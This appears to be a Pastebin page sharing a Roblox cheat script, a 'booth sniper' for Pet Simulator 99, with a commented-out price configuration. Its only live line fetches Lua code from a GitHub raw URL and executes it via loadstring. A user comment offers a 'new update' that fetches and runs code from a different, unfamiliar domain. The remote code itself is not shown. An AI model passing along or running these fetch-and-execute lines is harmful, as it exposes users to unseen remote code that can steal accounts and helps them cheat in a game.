Advertisement
petsim99scriptssdw

pet sim 99 booth sniper

Mar 30th, 2024
151
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. --pet sim 99 booth sniper
  2. --[[
  3.  
  4.  
  5. config = {
  6.  
  7. hugePrice = ajust price -- first price
  8. hugePrice2 = adjust price -- second price
  9.  
  10. main = {
  11.  
  12. minimumHuge = math.random(hugePrice, hugePrice2) -- this will buying titanic or huges from the price of hugePrice to hugePrice2
  13. ignoreGarbage = true -- only taking huge and titanics
  14. autoHop = true -- true mean you auto hop, false just stay in 1 server
  15.  
  16. }
  17.  
  18. howLongStay = 15 -- 15 seconds
  19. KEY = "Freetrial11"
  20. }
  21.  
  22. ]]--
  23.  
  24. loadstring(game:HttpGet("https://raw.githubusercontent.com/trdrock/boothsniper/main/booth.lua", true))()
Advertisement
Comments
  • Atom18
    237 days
    # text 0.09 KB | 0 0
    1. New update:loadstring(game:HttpGet('https://hugegames.space/546e7bf95e275c8cda0ff036.lua'))()
Add Comment
Please, Sign In to add comment
Advertisement